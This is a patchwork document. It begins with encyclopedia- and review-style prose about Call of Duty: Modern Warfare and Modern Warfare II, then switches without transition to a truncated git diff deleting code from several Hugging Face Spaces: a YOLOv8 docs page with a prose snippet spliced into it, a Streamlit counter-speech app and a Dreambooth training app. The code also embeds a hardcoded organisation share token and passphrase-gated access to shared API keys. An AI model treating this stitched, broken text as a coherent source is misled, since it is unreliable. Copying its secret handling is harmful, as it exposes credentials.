      The game takes place in a realistic and modern setting. The campaign follows a CIA officer and British SAS forces as they team up with rebels from the fictional Republic of Urzikstan, fighting against the Russian Armed Forces who have invaded the country and against the Urzik terrorist group Al-Qatala, while searching for a stolen shipment of chlorine gas. The game's Special Ops mode features cooperative play missions that follow on from the campaign. The multiplayer mode supports cross-platform multiplayer and cross-platform progression for the first time in the series. Its gameplay has been reworked to be more tactical and introduces new features, such as a Realism mode that removes the HUD, as well as a form of the Ground War mode that now supports 64 players. A post-launch update introduces a free-to-play battle royale mode, Warzone, which was also marketed as a standalone title. Multiplayer also supports shared-screen play, which includes bots, custom maps, custom game modes and other creative options.

      -

      Infinity Ward began working on the game soon after the release of their 2016 title Call of Duty: Infinite Warfare. They introduced an entirely new engine for the game, which allows for new performance enhancements such as more detailed environments and ray-tracing capabilities. For the campaign, they took influence from real-life conflicts, such as the Syrian Civil War and terrorist incidents that have occurred in London. For the multiplayer, they scrapped the franchise's traditional season pass and removed loot boxes, enabling them to distribute free post-launch content to the playerbase in the form of "Seasons".[4]

      -

      Modern Warfare received praise for its gameplay, campaign, multiplayer, and graphics. Criticism focused on the handling of the campaign's subject matter, including the depiction of the Russian military, as well as balancing issues in the multiplayer. A sequel, titled Modern Warfare II, was released in 2022.

      -

      Modern Warfare's multiplayer has been revised from its predecessors to allow for a more tactical gameplay style, including a focus on map exploration, door breaching, and a Hardcore "Realism" mode that removes the HUD. The mini-map was originally removed in favor of a compass-style marker, with visual cues to detect friendlies and opponents. Following feedback from the multiplayer beta test, Infinity Ward re-implemented the mini-map but removed the appearance of red dots representing enemy players (except for when the UAV killstreak is used). Multiplayer also features the return of Killstreaks (rewards based on kills), with more recent Call of Duty titles having used Scorestreaks (rewards based on score) instead. Killstreaks can, however, be converted into Scorestreaks with the use of an in-game perk called "Pointman". The online modes allow for a larger range of players within a map than previous installments, with a new mode called "Ground War" featuring over 100 players,[7][8][9] while conversely another new mode, "Gunfight", tasks two teams of two players against each other in small matches lasting forty seconds per round.[10] The game includes an extensive weapons customization system, presenting most guns with a range of up to 60 attachments to choose from (five of which can be equipped at any one time).[11] The introduction at the start of multiplayer matches has also been revamped; while in previous titles players would remain motionless on the map as a timer would countdown to zero, players will instead be transported into the battle zone as part of various animations.[8]

      -

      Modern Warfare is the first game in the series since 2013's Call of Duty: Ghosts not to feature a Zombies mode,[12] instead featuring the cooperative "Special Ops" mode previously present in Call of Duty: Modern Warfare 2 and Call of Duty: Modern Warfare 3.[13] Spec Ops shares its narrative with both the campaign and multiplayer.[14] It includes a "Survival" mode, which was a timed exclusive to the PlayStation 4 release until October 2020.[15] At launch, Special Ops features four Operations, which are multi-objective missions that take place in a large open map requiring mandatory 4-player cooperation; and Classic Special Ops, which features smaller scale missions, similar to the original Spec Ops mode.

      -

      Modern Warfare takes place in modern time, with the campaign occurring over the course of several days in late 2019, and the Special Ops and multiplayer modes continuing the story into 2020. The campaign story centers around a rising conflict between Russia and the fictional Republic of Urzikstan, also involving Western military forces. Players assume the roles of three protagonists: British SAS Sergeant Kyle "Gaz" Garrick (Elliot Knight), former Delta Force operator turned CIA SAC/SOG officer "Alex" (Chad Michael Collins), and Urzik rebel leader Farah Karim (Claudia Doumit). The three protagonists work together, alongside SAS Captain John Price (Barry Sloane) and CIA Station Chief Kate Laswell (Rya Kihlstedt). Other allies include U.S. Marine Corps General Lyons (Debra Wilson), Colonel Norris (Nick Boraine), and Demon Dogs leader Sergeant Marcus Griggs (LaMonica Garrett, later replaced by Demetrius Grosse);[b] Farah's elder brother Hadir Karim (Aidan Bristow); "Nikolai" (Stefan Kapičić), head of a Russian PMC acquainted with Price; and Yegor Novak (Alex Feldman), a Ukrainian fixer working for Nikolai. The allied forces are opposed by the Al-Qatala, an Urzik terrorist organization based in Urzikstan led by Omar "The Wolf" Sulaman (Joel Swetow) and his right-hand man Jamal "The Butcher" Rahar (Nick E. Tarabay), as well as General Roman Barkov (Konstantin Lavysh), commander of a rogue Russian faction who treats Farah's rebel forces and the Al-Qatala equally as criminals.

      -

      -

      The game's multiplayer beta in September 2019 was withdrawn for unknown reasons from the PlayStation Store in Russia. A prominent theory posits that this is because the Russian media had been critical of the game's campaign's reportedly favorable portrayal of the White Helmets, a volunteer organisation that operates in parts of opposition-controlled and Turkish-occupied Syria.[39] In October 2019, Sony announced that Modern Warfare would not be sold on the PlayStation Store in Russia.[40]

      -

      Call of Duty: Modern Warfare received "generally favorable reviews" on all platforms according to review aggregator site Metacritic.[41][43][42] The game was praised for its gameplay, campaign (considered by critics to be one of the best in the franchise), multiplayer, graphics, and overall improvements to the Call of Duty formula. However, the game drew some criticism for aspects of the campaign's handling of its subject matter, as well as for minor balancing issues in some of the online modes.[51][52][53]

      -

      Modern Warfare has been criticized for its inclusion of white phosphorus strikes as a killstreak in the multiplayer.[80][81] Use of white phosphorus as an incendiary agent is regulated by international law: the provisions of the Convention on Certain Conventional Weapons, specifically the Protocol on Incendiary Weapons, prohibit the use of incendiary weapons against or near civilian areas.[citation needed]

      -

      In a statement to IGN, former U.S. Marine John Phipps criticized the game for failing to realistically portray the effects of the substance, saying "I find Modern Warfare's use as a killstreak reward a nearsighted glorification of what myself and others consider to be a violation of the laws of armed conflict. Contrary to their overall goals towards realism in its campaign, the multiplayer mode in CoD doesn't depict the effect White Phosphorus (WP) has on the human body in any kind of realistic way. I don't object to things like WP being examined in games, so long as we depict them as they truly are".[82] In her review of the game, Kallie Plagge of GameSpot made note of the inclusion of white phosphorus as a killstreak reward in multiplayer and included it in her list of the game's negative aspects, adding that it "goes against everything the campaign stands for".[45]

      -

      Infinity Ward's rebooted Modern Warfare 2 brings back a more classic Call of Duty multiplayer experience than we've seen in recent years, with maps better tailored to traditional 6v6 play and dialed-back movement mechanics. Modern Warfare 2's gameplay really feels like a refreshing return to old times for Call of Duty, but unfortunately, the package as a whole feels lacking and gun customization is overly complex.

      -

      Editor's note: Given the staggered release of Call of Duty Modern Warfare 2's campaign and multiplayer, as well as Warzone 2.0, GameSpot will be publishing three separate reviews to ensure our verdicts can be delivered in a timely manner, while also giving each of these experiences the focus they need. You can read our Modern Warfare 2 campaign review here.

      -

      Infinity Ward also revealed Sunday the date for the Modern Warfare 2 multiplayer beta. PS4 and PS5 owners will have their first crack at the beta, with those who preordered Modern Warfare 2 getting early access starting Friday, Sept. 16, at 10 a.m. PT/1 p.m. ET. All other PlayStation gamers can jump in the beta starting on Sunday, Sept. 18, and the test will last until Tuesday, Sept. 20. A PS Plus subscription isn't required to be part of the beta.

      -

      Upon returning to the Modern Warfare series, Infinity Ward set out to create a game ripped straight from the real-world terrorism of modern-day 2019. A week before the game's reveal, studio narrative director Taylor Kurosaki and single-player director Jacob Minkoff described the new game to journalists as a more mature, authentic and relevant Call of Duty game that's not a superhero caricature but instead a down-to-earth representation of the realities of being a soldier. It's "taking scenarios that are ripped from the headlines."[5] Among the stated goals for the game's campaign: "Create an emotional connection through the realities of war," and "Push the boundaries of the medium."[6]

      aaccfb2cb3
      -
      -
      \ No newline at end of file diff --git a/spaces/vaishanthr/Simultaneous-Segmented-Depth-Prediction/yolov8/docs/reference/nn/autoshape.md b/spaces/vaishanthr/Simultaneous-Segmented-Depth-Prediction/yolov8/docs/reference/nn/autoshape.md deleted file mode 100644 index b009e090a2a2ee3ca0ca9314537bb9a7e32b71b7..0000000000000000000000000000000000000000 --- a/spaces/vaishanthr/Simultaneous-Segmented-Depth-Prediction/yolov8/docs/reference/nn/autoshape.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -description: Detect 80+ object categories with bounding box coordinates and class probabilities using AutoShape in Ultralytics YOLO. Explore Detections now. -keywords: Ultralytics, YOLO, docs, autoshape, detections, object detection, customized shapes, bounding boxes, computer vision ---- - -## AutoShape ---- -### ::: ultralytics.nn.autoshape.AutoShape -

      - -## Detections ---- -### ::: ultralytics.nn.autoshape.Detections -

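For orientation, here is a minimal usage sketch of the AutoShape/Detections pair documented above. It assumes the YOLOv5 hub weights, which load already wrapped in AutoShape; the exact module path inside the ultralytics package may differ between releases, so treat the snippet as illustrative rather than canonical.

```python
# Minimal sketch (assumption: YOLOv5 hub weights, which come pre-wrapped in AutoShape).
import torch

# The hub call returns an AutoShape-wrapped model that accepts file paths, URLs,
# PIL images, numpy arrays, or torch tensors.
model = torch.hub.load("ultralytics/yolov5", "yolov5s", pretrained=True)

# Inference returns a Detections object.
results = model("https://ultralytics.com/images/zidane.jpg")

results.print()          # per-class detection summary
boxes = results.xyxy[0]  # [x1, y1, x2, y2, confidence, class] per detection
print(boxes)
```

In the YOLOv5 implementation, the Detections object also exposes .show(), .save(), and .pandas() helpers for visualising or exporting the results.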
      diff --git a/spaces/vanderbilt-dsi/free-speech-app/app.py b/spaces/vanderbilt-dsi/free-speech-app/app.py deleted file mode 100644 index 2d6e7aaf28e592b3d69bab1da1d453de035bd364..0000000000000000000000000000000000000000 --- a/spaces/vanderbilt-dsi/free-speech-app/app.py +++ /dev/null @@ -1,289 +0,0 @@ -import streamlit as st -import streamlit_authenticator as stauth -from deta import Deta -import yaml -from yaml.loader import SafeLoader -import os -from cryptography.fernet import Fernet - -from free_speech_app.DataLoadDb import * -from free_speech_app.FreeSpeechPromptsResponses import * -from langchain.chat_models import ChatOpenAI - - -#connect to/create Deta user database - -deta = Deta(st.secrets["deta_key"]) -db = deta.Base("user_data") - -# fernet key (generated locally, stored in streamlit secrets) -fernet = Fernet(bytes(st.secrets["fernet_key"], 'utf-8')) - -# activeloop_token -os.environ["ACTIVELOOP_TOKEN"] = st.secrets["deeplake_key"] - -config_drive = deta.Drive("passwords") -config = config_drive.get("config.yaml").read() - -config = yaml.load(config, Loader=SafeLoader) - -# Create an authenticator -authenticator = stauth.Authenticate( - config['credentials'], - config['cookie']['name'], - config['cookie']['key'], - config['cookie']['expiry_days'], - config['preauthorized'] -) - - -def get_user_data(user): - data = db.fetch().items - for person in data: - if person['key'] == user: - return person - return None - -def encrypt(api_key: str, fernet) -> bytes: - """Encrypt the API key.""" - return fernet.encrypt(api_key.encode()) - - -def decrypt(encrypted_api_key: bytes, fernet) -> str: - """Decrypt the encrypted API key.""" - return fernet.decrypt(encrypted_api_key).decode() - - -def add_logos(): - st.title("Freequalizer") - left_col_log, right_col_log = st.columns(2) - free_speech_logo = './free_speech_app/logos/Future-of-Free-Speech-logo.png' - vu_logo = './free_speech_app/logos/Vanderbilt-University-Logo.png' - with left_col_log: - st.image(free_speech_logo, caption=None, width=200, use_column_width=None, - clamp=False, channels="RGB", output_format="auto") - with right_col_log: - st.image(vu_logo, caption=None, width=200, use_column_width=None, - clamp=False, channels="RGB", output_format="auto") - - -# Render the login module -add_logos() -name, authentication_status, username = authenticator.login('Login', 'main') - -# If the user is authenticated -if authentication_status: - authenticator.logout('Logout', 'main', key='unique_key') - st.write(f'Welcome *{name}*') - - # Sidebar for navigation - page = st.sidebar.radio("Choose a page", ["Account Setup", "API Key Help", "Respond to Post"]) - - - # Fetch user data from the database - user_data = get_user_data(username) - - if page == "Account Setup": - add_logos() - - st.title("Account Setup") - st.markdown("Please use this page to provide your OpenAI API Key, Principles and Writing Style. **Please make sure to press the Save Changes button after providing the information.**") - - # Input boxes with existing data - - if 'api_key' not in st.session_state: - st.session_state.api_key = "" - api_input = st.text_input("Paste OpenAI API Key", value=decrypt(user_data["api_key"].encode()[ - 2:-1], fernet) if user_data and "api_key" in user_data else "", type="password") - encrypted_api_key = str(encrypt(api_input, fernet)) - st.session_state.api_key = api_input - - principles = st.text_area("My Principles (Paste Principles here)", height = 300, placeholder = "Think about the hate speech you want to counter. 
What makes you want to write back? Note any principles that are true to your heart, from an abstract thought to a well-defined concept. For ideas, consider: a theory, philosophy, law, policy, workplace professional ethic, cultural norm, family value, idiomatic saying, colloquialism, life lesson, habit, intuition, literary or artistic expression, fortune cookie message, etc.", value=user_data["principles"] if user_data and "principles" in user_data else "") - writing_style = st.text_area("My Writing Style (Paste Examples)", height = 300, placeholder = "Provide examples of your writing style here", value=user_data["writing_style"] if user_data and "writing_style" in user_data else "") - #sources = st.text_area("Sources (This autopopulates for your reference)", value=st.session_state.sources if 'sources' in st.session_state else '', key = 'sources_key', height = 100) - - # Update button - if st.button("Save Changes"): - db.put({"key": username, "principles": principles, "writing_style": writing_style, "api_key": encrypted_api_key}) - - if page == "API Key Help": - add_logos() - - st.title("OpenAI API Key Setup") - - st.header('What is an API key?') - st.write('An API (Application Programming Interface) key is like a password that allows you to access certain functions or data from a website or service. Many sites use API keys to identify you and control access to their APIs.') - - st.header('Why do you need an API key?') - st.write('API keys allow sites to track usage and prevent abuse of their services. They help keep things secure. When you request an API key, the site knows the calls are coming from you.') - - image = 'apikeyex.png' - st.header('How to get an OpenAI API key:') - st.write('1. Go to https://platform.openai.com/account/api-keys') - st.write('2. Log in or create an OpenAI account if you do not have one') - st.write('3. Click "Create new secret key" and give your key a name') - st.image(image, caption=None, width=None, use_column_width=None, - clamp=False, channels="RGB", output_format="auto") - st.write('4. Copy the generated API key and keep it private like a password') - - st.header('Using your API key') - st.write('When making calls to the OpenAI API, include your API key in the request headers or parameters to authenticate.') - st.code('headers = {"Authorization": f"Bearer {YOUR_API_KEY}"}') - - st.warning('Treat your API key like a secret! Do not share it publicly.') - - elif page == "Respond to Post": - add_logos() - st.title("Respond to Post") - - left_col, right_col = st.columns(2) - - # Input boxes - - - with right_col: - background_info = st.text_area("Background information on original post (This autopopulates for your reference). 
The Background information generated by OpenAI's GPT-4.", height = 780, value=st.session_state.background_info if 'background_info' in st.session_state else '', key = 'background_info_key') - - with left_col: - original_post = st.text_area("Paste Original Post Here \n", height=100) - word_limit = st.text_input("Word Limit for Response", placeholder = "Please provide a word limit for the response") - - chat_mdl = None - draft_response = '' - - # Check if the "Submit" button is clicked - if st.button("Submit"): - if st.session_state.api_key: - os.environ["OPENAI_API_KEY"] = st.session_state.api_key - # add condition to check for passphrase to allow use of DSI api key stored in secrets - if (os.environ["OPENAI_API_KEY"] == st.secrets["secret_passphrase"]): - #umang key - os.environ["OPENAI_API_KEY"] = st.secrets["dsi_openai_key"] - elif (os.environ["OPENAI_API_KEY"] == st.secrets["secret_passphrase2"]): - #abbie key - os.environ["OPENAI_API_KEY"] = st.secrets["dsi_openai_key2"] - elif (os.environ["OPENAI_API_KEY"] == st.secrets["secret_passphrase3"]): - #myranda key - os.environ["OPENAI_API_KEY"] = st.secrets["dsi_openai_key3"] - elif (os.environ["OPENAI_API_KEY"] == st.secrets["secret_passphrase4"]): - #jasmine key - os.environ["OPENAI_API_KEY"] = st.secrets["dsi_openai_key4"] - chat_mdl = ChatOpenAI(model_name='gpt-4', temperature=0.1) - - else: - st.warning('Please enter Open AI API Key') - - if chat_mdl is not None: - if user_data is None: - - draft_response, background_text = generate_custom_response(original_post, chat_mdl, "", "", word_limit) - - st.session_state.draft_response = draft_response.content - st.session_state.background_text = background_text - # st.session_state.sources_text = sources_text - st.session_state.background_info = background_text - # st.session_state.sources = sources_text - st.rerun() - else: - - draft_response, background_text = generate_custom_response(original_post, chat_mdl, user_data['principles'], user_data['writing_style'], word_limit) - - st.session_state.draft_response = draft_response.content - st.session_state.background_text = background_text - # st.session_state.sources_text = sources_text - st.session_state.background_info = background_text - # st.session_state.sources = sources_text - st.rerun() - - # Ensure session state variables are initialized - if 'draft_response' not in st.session_state: - st.session_state.draft_response = '' - if 'regenerate_prompt' not in st.session_state: - st.session_state.regenerate_prompt = '' - - # Output from function - response_textarea = st.text_area( - label="Draft Response. 
Please edit here or prompt suggestions in the box below.", - value=st.session_state.draft_response if 'draft_response' in st.session_state else '', - height=350, - key='draft_response_key' - ) - - # Initialization of the regeneration flag - if 'is_regenerating' not in st.session_state: - st.session_state.is_regenerating = False - - # Check if the app is in the "regeneration" phase - if st.session_state.is_regenerating: - # Display the regenerated response explicitly - regenerate_prompt = st.text_area( - "Request a new draft", - value=st.session_state.regenerate_prompt, - placeholder="You may edit the regenerated draft directly above, or request further changes here.", - height=100, - key='regenerate_prompt_key' - ) - # Reset the regeneration flag - st.session_state.is_regenerating = False - else: - # Normal behavior: display the text area for manual input - regenerate_prompt = st.text_area( - "Request a new draft", - placeholder="You may edit the draft directly above, or request a new draft with additional guidance here.", - height=100, - key='regenerate_prompt_key' - ) - - if (draft_response is not None) and (regenerate_prompt is not None): - if st.button("Regenerate"): - if st.session_state.api_key: - os.environ['OPENAI_API_KEY'] = st.session_state.api_key - # add condition to check for passphrase to allow use of DSI api key stored in secrets - if (os.environ["OPENAI_API_KEY"] == st.secrets["secret_passphrase"]): - #umang key - os.environ["OPENAI_API_KEY"] = st.secrets["dsi_openai_key"] - elif (os.environ["OPENAI_API_KEY"] == st.secrets["secret_passphrase2"]): - #abbie key - os.environ["OPENAI_API_KEY"] = st.secrets["dsi_openai_key2"] - elif (os.environ["OPENAI_API_KEY"] == st.secrets["secret_passphrase3"]): - #myranda key - os.environ["OPENAI_API_KEY"] = st.secrets["dsi_openai_key3"] - elif (os.environ["OPENAI_API_KEY"] == st.secrets["secret_passphrase4"]): - #jasmine key - os.environ["OPENAI_API_KEY"] = st.secrets["dsi_openai_key4"] - chat_mdl = ChatOpenAI( - model_name='gpt-4', temperature=0.1) - - if chat_mdl is not None: - updated_response = regenerate_custom_response( - chat_mdl, regenerate_prompt, st.session_state.draft_response).content - st.session_state.draft_response = updated_response - st.session_state.is_regenerating = False - - st.rerun() - - -elif authentication_status is False: - st.error('Username/password is incorrect') - # added registration module if username/password is incorrect - - try: - if authenticator.register_user('New User Registration', preauthorization=False): - st.success('User Registered Successfully! Please log in above.') - except Exception as e: - st.error(e) - -elif authentication_status is None: - st.warning('Please enter your username and password') - - try: - if authenticator.register_user('New User Registration', preauthorization=False): - st.success('User Registered Successfully! 
Please log in above.') - except Exception as e: - st.error(e) - - -with open('config.yaml', 'w') as file: - yaml.dump(config, file, default_flow_style=False) - -config_drive.put("config.yaml", path="config.yaml") diff --git a/spaces/victor/dreambooth-training/app.py b/spaces/victor/dreambooth-training/app.py deleted file mode 100644 index 25728e55803278642ca68a4f8da27d72745667aa..0000000000000000000000000000000000000000 --- a/spaces/victor/dreambooth-training/app.py +++ /dev/null @@ -1,340 +0,0 @@ -import gradio as gr -import os -from pathlib import Path -import argparse -import shutil -from train_dreambooth import run_training -from convertosd import convert -from PIL import Image -from slugify import slugify -import requests -import torch -import zipfile -from diffusers import StableDiffusionPipeline - -css = ''' - .instruction{position: absolute; top: 0;right: 0;margin-top: 0px !important} - .arrow{position: absolute;top: 0;right: -110px;margin-top: -8px !important} - #component-4, #component-3, #component-10{min-height: 0} -''' -model_to_load = "multimodalart/sd-fine-tunable" -maximum_concepts = 3 -#Pre download the files even if we don't use it here -StableDiffusionPipeline.from_pretrained(model_to_load) - -def zipdir(path, ziph): - # ziph is zipfile handle - for root, dirs, files in os.walk(path): - for file in files: - ziph.write(os.path.join(root, file), - os.path.relpath(os.path.join(root, file), - os.path.join(path, '..'))) - -def swap_text(option): - mandatory_liability = "You must have the right to do so and you are liable for the images you use, example:" - if(option == "object"): - instance_prompt_example = "cttoy" - freeze_for = 50 - return [f"You are going to train `object`(s), upload 5-10 images of each object you are planning on training on from different angles/perspectives. {mandatory_liability}:", '''''', f"You should name your concept with a unique made up word that has low chance of the model already knowing it (e.g.: `{instance_prompt_example}` here). Images will be automatically cropped to 512x512.", freeze_for] - elif(option == "person"): - instance_prompt_example = "julcto" - freeze_for = 100 - return [f"You are going to train a `person`(s), upload 10-20 images of each person you are planning on training on from different angles/perspectives. {mandatory_liability}:", '''''', f"You should name the files with a unique word that represent your concept (e.g.: `{instance_prompt_example}` here). Images will be automatically cropped to 512x512.", freeze_for] - elif(option == "style"): - instance_prompt_example = "trsldamrl" - freeze_for = 10 - return [f"You are going to train a `style`, upload 10-20 images of the style you are planning on training on. Name the files with the words you would like {mandatory_liability}:", '''''', f"You should name your files with a unique word that represent your concept (e.g.: `{instance_prompt_example}` here). 
Images will be automatically cropped to 512x512.", freeze_for] - -def count_files(*inputs): - file_counter = 0 - concept_counter = 0 - for i, input in enumerate(inputs): - if(i < maximum_concepts-1): - files = inputs[i] - if(files): - concept_counter+=1 - file_counter+=len(files) - uses_custom = inputs[-1] - type_of_thing = inputs[-4] - if(uses_custom): - Training_Steps = int(inputs[-3]) - else: - if(type_of_thing == "person"): - Training_Steps = file_counter*200*2 - else: - Training_Steps = file_counter*200 - return(gr.update(visible=True, value=f"You are going to train {concept_counter} {type_of_thing}(s), with {file_counter} images for {Training_Steps} steps. This should take around {round(Training_Steps/1.5, 2)} seconds, or {round((Training_Steps/1.5)/3600, 2)} hours. As a reminder, the T4 GPU costs US$0.60 for 1h. Once training is over, don't forget to swap the hardware back to CPU.")) - -def train(*inputs): - if "IS_SHARED_UI" in os.environ: - raise gr.Error("This Space only works in duplicated instances") - if os.path.exists("output_model"): shutil.rmtree('output_model') - if os.path.exists("instance_images"): shutil.rmtree('instance_images') - if os.path.exists("diffusers_model.zip"): os.remove("diffusers_model.zip") - if os.path.exists("model.ckpt"): os.remove("model.ckpt") - file_counter = 0 - for i, input in enumerate(inputs): - if(i < maximum_concepts-1): - if(input): - os.makedirs('instance_images',exist_ok=True) - files = inputs[i+(maximum_concepts*2)] - prompt = inputs[i+maximum_concepts] - if(prompt == "" or prompt == None): - raise gr.Error("You forgot to define your concept prompt") - for j, file_temp in enumerate(files): - file = Image.open(file_temp.name) - width, height = file.size - side_length = min(width, height) - left = (width - side_length)/2 - top = (height - side_length)/2 - right = (width + side_length)/2 - bottom = (height + side_length)/2 - image = file.crop((left, top, right, bottom)) - image = image.resize((512, 512)) - extension = file_temp.name.split(".")[1] - image = image.convert('RGB') - image.save(f'instance_images/{prompt}_({j+1}).jpg', format="JPEG", quality = 100) - file_counter += 1 - - os.makedirs('output_model',exist_ok=True) - uses_custom = inputs[-1] - type_of_thing = inputs[-4] - if(uses_custom): - Training_Steps = int(inputs[-3]) - Train_text_encoder_for = int(inputs[-2]) - else: - Training_Steps = file_counter*200 - if(type_of_thing == "object"): - Train_text_encoder_for=30 - elif(type_of_thing == "person"): - Train_text_encoder_for=60 - elif(type_of_thing == "style"): - Train_text_encoder_for=15 - - class_data_dir = None - stptxt = int((Training_Steps*Train_text_encoder_for)/100) - args_general = argparse.Namespace( - image_captions_filename = True, - train_text_encoder = True, - stop_text_encoder_training = stptxt, - save_n_steps = 0, - pretrained_model_name_or_path = model_to_load, - instance_data_dir="instance_images", - class_data_dir=class_data_dir, - output_dir="output_model", - instance_prompt="", - seed=42, - resolution=512, - mixed_precision="fp16", - train_batch_size=1, - gradient_accumulation_steps=1, - use_8bit_adam=True, - learning_rate=2e-6, - lr_scheduler="polynomial", - lr_warmup_steps = 0, - max_train_steps=Training_Steps, - ) - run_training(args_general) - torch.cuda.empty_cache() - #convert("output_model", "model.ckpt") - #shutil.rmtree('instance_images') - #shutil.make_archive("diffusers_model", 'zip', "output_model") - with zipfile.ZipFile('diffusers_model.zip', 'w', zipfile.ZIP_DEFLATED) as zipf: - 
zipdir('output_model/', zipf) - torch.cuda.empty_cache() - return [gr.update(visible=True, value=["diffusers_model.zip"]), gr.update(visible=True), gr.update(visible=True), gr.update(visible=True)] - -def generate(prompt): - from diffusers import StableDiffusionPipeline - - pipe = StableDiffusionPipeline.from_pretrained("./output_model", torch_dtype=torch.float16) - pipe = pipe.to("cuda") - image = pipe(prompt).images[0] - return(image) - -def push(model_name, where_to_upload, hf_token): - if(not os.path.exists("model.ckpt")): - convert("output_model", "model.ckpt") - from huggingface_hub import HfApi, HfFolder, CommitOperationAdd - from huggingface_hub import create_repo - model_name_slug = slugify(model_name) - if(where_to_upload == "My personal profile"): - api = HfApi() - your_username = api.whoami(token=hf_token)["name"] - model_id = f"{your_username}/{model_name_slug}" - else: - model_id = f"sd-dreambooth-library/{model_name_slug}" - headers = {"Authorization" : f"Bearer: {hf_token}", "Content-Type": "application/json"} - response = requests.post("https://huggingface.co/organizations/sd-dreambooth-library/share/SSeOwppVCscfTEzFGQaqpfcjukVeNrKNHX", headers=headers) - - images_upload = os.listdir("instance_images") - image_string = "" - instance_prompt_list = [] - previous_instance_prompt = '' - for i, image in enumerate(images_upload): - instance_prompt = image.split("_")[0] - if(instance_prompt != previous_instance_prompt): - title_instance_prompt_string = instance_prompt - instance_prompt_list.append(instance_prompt) - else: - title_instance_prompt_string = '' - previous_instance_prompt = instance_prompt - image_string = f'''{title_instance_prompt_string} -{image_string}![{instance_prompt} {i}](https://huggingface.co/{model_id}/resolve/main/sample_images/{image})''' - readme_text = f'''--- -license: creativeml-openrail-m -tags: -- text-to-image ---- -### {model_name} Dreambooth model trained by {api.whoami(token=hf_token)["name"]} with [Hugging Face Dreambooth Training Space](https://huggingface.co/spaces/multimodalart/dreambooth-training) - -You run your new concept via `diffusers` [Colab Notebook for Inference](https://colab.research.google.com/github/huggingface/notebooks/blob/main/diffusers/sd_dreambooth_inference.ipynb) - -Sample pictures of this concept: -{image_string} -''' - #Save the readme to a file - readme_file = open("README.md", "w") - readme_file.write(readme_text) - readme_file.close() - #Save the token identifier to a file - text_file = open("token_identifier.txt", "w") - text_file.write(', '.join(instance_prompt_list)) - text_file.close() - create_repo(model_id,private=True, token=hf_token) - operations = [ - CommitOperationAdd(path_in_repo="token_identifier.txt", path_or_fileobj="token_identifier.txt"), - CommitOperationAdd(path_in_repo="README.md", path_or_fileobj="README.md"), - CommitOperationAdd(path_in_repo=f"model.ckpt",path_or_fileobj="model.ckpt") - ] - api.create_commit( - repo_id=model_id, - operations=operations, - commit_message=f"Upload the model {model_name}", - token=hf_token - ) - api.upload_folder( - folder_path="output_model", - repo_id=model_id, - token=hf_token - ) - api.upload_folder( - folder_path="instance_images", - path_in_repo="concept_images", - repo_id=model_id, - token=hf_token - ) - return [gr.update(visible=True, value=f"Successfully uploaded your model. 
Access it [here](https://huggingface.co/{model_id})"), gr.update(visible=True, value=["diffusers_model.zip", "model.ckpt"])] - -def convert_to_ckpt(): - convert("output_model", "model.ckpt") - return gr.update(visible=True, value=["diffusers_model.zip", "model.ckpt"]) - -with gr.Blocks(css=css) as demo: - with gr.Box(): - if "IS_SHARED_UI" in os.environ: - gr.HTML(''' -
      -

      Attention - This Space doesn't work in this shared UI

      -

      For it to work, you have to duplicate the Space and run it on your own profile, where a (paid) private GPU will be assigned to it at runtime. As each T4 costs US$0.60/h, it should cost less than US$1 to train a model with fewer than 100 images on default settings!

      - - -
      - ''') - else: - gr.HTML(''' -
      -

      You have successfully duplicated the Dreambooth Training Space

      -

      If you haven't already, assign a T4 GPU to it (via the Settings tab) and run the training below. You will be billed by the minute from when you activate the GPU until you turn it off.

      -
      - ''') - gr.Markdown("# Dreambooth training") - gr.Markdown("Customize Stable Diffusion by giving it with few-shot examples") - with gr.Row(): - type_of_thing = gr.Dropdown(label="What would you like to train?", choices=["object", "person", "style"], value="object", interactive=True) - - with gr.Row(): - with gr.Column(): - thing_description = gr.Markdown("You are going to train an `object`, upload 5-10 images of the object you are planning on training on from different angles/perspectives. You must have the right to do so and you are liable for the images you use, example:") - thing_image_example = gr.HTML('''''') - things_naming = gr.Markdown("You should name your concept with a unique made up word that has low chance of the model already knowing it (e.g.: `cttoy` here). Images will be automatically cropped to 512x512.") - with gr.Column(): - file_collection = [] - concept_collection = [] - buttons_collection = [] - delete_collection = [] - is_visible = [] - - row = [None] * maximum_concepts - for x in range(maximum_concepts): - ordinal = lambda n: "%d%s" % (n, "tsnrhtdd"[(n // 10 % 10 != 1) * (n % 10 < 4) * n % 10::4]) - if(x == 0): - visible = True - is_visible.append(gr.State(value=True)) - else: - visible = False - is_visible.append(gr.State(value=False)) - - file_collection.append(gr.File(label=f"Upload the images for your {ordinal(x+1)} concept", file_count="multiple", interactive=True, visible=visible)) - with gr.Column(visible=visible) as row[x]: - concept_collection.append(gr.Textbox(label=f"{ordinal(x+1)} concept prompt - use a unique, made up word to avoid collisions")) - with gr.Row(): - if(x < maximum_concepts-1): - buttons_collection.append(gr.Button(value="Add +1 concept", visible=visible)) - if(x > 0): - delete_collection.append(gr.Button(value=f"Delete {ordinal(x+1)} concept")) - - counter_add = 1 - for button in buttons_collection: - if(counter_add < len(buttons_collection)): - button.click(lambda: - [gr.update(visible=True),gr.update(visible=True), gr.update(visible=False), gr.update(visible=True), True, None], - None, - [row[counter_add], file_collection[counter_add], buttons_collection[counter_add-1], buttons_collection[counter_add], is_visible[counter_add], file_collection[counter_add]], queue=False) - else: - button.click(lambda:[gr.update(visible=True),gr.update(visible=True), gr.update(visible=False), True], None, [row[counter_add], file_collection[counter_add], buttons_collection[counter_add-1], is_visible[counter_add]], queue=False) - counter_add += 1 - - counter_delete = 1 - for delete_button in delete_collection: - if(counter_delete < len(delete_collection)+1): - delete_button.click(lambda:[gr.update(visible=False),gr.update(visible=False), gr.update(visible=True), False], None, [file_collection[counter_delete], row[counter_delete], buttons_collection[counter_delete-1], is_visible[counter_delete]], queue=False) - counter_delete += 1 - - - - with gr.Accordion("Custom Settings", open=False): - swap_auto_calculated = gr.Checkbox(label="Use custom settings") - gr.Markdown("If not checked, the number of steps and % of frozen encoder will be tuned automatically according to the amount of images you upload and whether you are training an `object`, `person` or `style` as follows: The number of steps is calculated by number of images uploaded multiplied by 20. 
